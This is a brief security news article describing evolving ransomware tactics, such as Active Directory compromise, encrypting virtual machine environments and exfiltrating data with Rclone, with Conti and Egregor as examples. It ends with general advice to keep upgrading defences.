Ransomware operators are increasingly using new tactics and strategies to make their attacks more effective. This includes new methods of putting more pressure on victims, such as the use of the double extortion technique, as well as new business tactics such as cartel formation. Another important aspect is the evolution of technical strategies and the use of sophisticated tools, allowing them to carry out stealth attacks.
What is happening?
In a recent session at the 2021 Incident Response Forum Masterclass, a panel of IT experts highlighted several traits related to evolving ransomware attacks.
- Experts have identified an increase in ransomware intrusion attacks by compromising Active Directory. Attackers often spend long periods of time inside the environment and keep looking for all connected systems.
- When Active Directory and domain controllers are set up on a virtual machine, attackers tend to encrypt the entire VM environment, which slows down the forensic analysis.
- To copy the files, attackers are now moving away from traditional methods (FileZilla or Megaupload) and adopting open-source tools, such as Rclone, which leaves lesser footprints and is difficult to trace.
- In some cases, attackers have been collecting data from multiple sources, thus making it difficult to identify what all data sources were compromised by them.
Recent incidents using these tactics
Several attackers have been observed using the above-mentioned tactics during recent attacks.
- The recent catastrophic attack on SolarWinds has proved how attackers can use Active Directory as a method to get hold of the entire network of any organization.
- Conti ransomware was observed using the Rclone tool for data exfiltration and credential gathering
- Egregor ransomware, which is assumed to be the successor of Maze, has also been observed including Rclone and Cobalt Strike in its attack campaigns.
The bottom line
Ransomware attackers are enhancing their tactics and sharpening their tools with every passing day. However, this evolution is troubling for the targeted victims, as well as for security agencies that are working hard to cope with such attacks. Therefore, it is recommended to keep upgrading security measures, while keeping in mind that such attacks will only grow fiercer in the near future.